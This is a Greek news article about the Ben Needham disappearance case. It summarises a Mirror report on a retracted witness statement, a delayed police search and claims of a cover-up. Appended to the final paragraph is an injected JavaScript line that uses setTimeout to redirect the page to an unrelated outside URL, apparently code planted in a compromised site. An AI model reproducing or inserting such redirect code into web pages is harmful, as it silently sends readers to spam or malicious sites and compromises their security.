Μυστικά, ψέματα και συγκάλυψη πίσω από την υπόθεση του Μπεν Νίνταμ

0
25

 

Δημοσίευμα της βρετανικής Mirror κάνει λόγο για συγκάλυψη και αισχρά ψέματα πίσω από την υπόθεση του μικρού Μπεν.

Σύμφωνα με την εφημερίδα, μετά τη νέα έρευνα αποκαλύπτινται νέα στοιχεία σύμφωνα με τα οποία, ένας μαρτυρας παραδέχθηκε ότι είπε ψέματα το 1991 ότι το βράδυ πυο εξαφανίσθηκε το παιδί εκείνος έκανε σεξ με τη μητέρα του, Κέρι Νίνταμ, ενώ εκείνη ήταν έξω και αναζητούσε τον Μπεν.

Ένας συνταξιούχος Έλληνας αξιωματούχος δήλωσε πως ήταν τραγικό λάθος ότι η έρευνα ξεκίνησε 24 ώρες μετά την εξαφάνιση ενώ άλλος πρώην αστυνομικός παραδέχθηκε ότι τους ασκήθηκε πίεση να κλείσουν την έρευνα όσο το δυνατόν γρηγορότερα. Επίσης, σύμφωνα με τη Mirror, ακόμη στο νησί επικρατεί η φήμη ότι το παιδί το άρπαξαν οι τσιγγάνοι ή έπεσε θύμα της μαφίας.

Ακόμη η αστυνομία του South Yorkshire υποπτεύεται πως το 21 μηνών παιδάκι θάφτηκε κάτω από τα μπάζα από τον εκσκαφέα του Κωνσταντίνου Μπάρκα ο οποίος ωστόσο πέθανε χωρίς ποτέ να παραδεχθεί ότι ευθύνεται έστω και άθελά του για τον θάνατο του παιδιού.

Η μητέρα θεωρεί πως υπάρχει συγκάλυψη της υπόθεσης, όπως αναφέρεται στο δημοσίευμα, καθώς οι άνθρωποι στο νησί την πίεζαν να φύγει και να ξεχάσει τον Μπεν.

Ο άνδρας που ισχυρίστηκε ότι η μητέρα του Μπεν έκανε σεξ μαζί του αντί να ψάχνει για το παιδί όπως η ίδια είχε πει, εξαφανίστηκε από το νησί λίγο καιρό μετά την κατάθεσή του. Έτσι η κοινή γνώμη στράφηκε κατά της ανύπαντρης μητέρας και πολλοί κατηγόρησαν την οικογένεια για το περιστατικό. Ωστόσο, η αστυνομία της Βρετανίας αποκάλυψε στην Κέρι ότι ο μάρτυρας εμφανίστηκε και άλλαξε την κατάθεσή του, λέγοντας ότι είπε ψέματα καθώς του άσκησαν πίεση να πει αυτά που είπε.

Όσο για τις δηλώσεις του αστυνομικού ότι καθυστέρησε κατά 24 ώρες η έναρξη της επίσημης έρευνας, ο ίδιος είπε ότι φοβόταν για τη ζωή του και γι’ αυτό δεν μιλούσε και σημείωσε πως αν και το συνηθισμένο είναι η έρευνα για κάποιον αγνοούμενο να ξεκινά 24 ώρες μετά τη δήλωση, αφού η εξαφάνιση αφορούσε 21 μηνών παιδί έπρεπε να αρχίσει αμέσως χωρίς καμία καθυστέρηση. «Δεν πήγαν καν στο λιμάνι όπως όφειλαν να κάνουν» σημείωσε ο άνδρας. Μάλιστα, υπογράμμισε ότι δεν εδόθη σημασία από τους ανωτέρους του για μία κατάθεση που έκανε λόγο για ένα αγνώστου ιδιοκτησίας ΙΧ όπου επέβαιναν δύο άτομα τα οποία δεν ήταν Έλληνες. Καθώς το παιδί έπαιζε μπροστά στο σπίτι, ο ένας από τους άνδρες βγήκε από το αυτοκίνητο και το άρπαξε. Ο μάρτυρας δεν έλεγε ψέματα, αλλά μόλις έμαθε ότι επρόκειτο για αρπαγή δεν ήθελε να μιλήσει. «Μην με ρωτάτε περισσότερα, φοβάμαι» φέρεται να είπε στον συνταξιούχο αστυνομικό.

Πολλοί που γνωρίζουν την αλήθεια και είναι ακόμη στη ζωή φοβούνται να μιλήσουν και συγκαλύπτουν την αλήθεια για την τύχη του μικρού Μπεν, σύμφωνα με τη Mirror. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here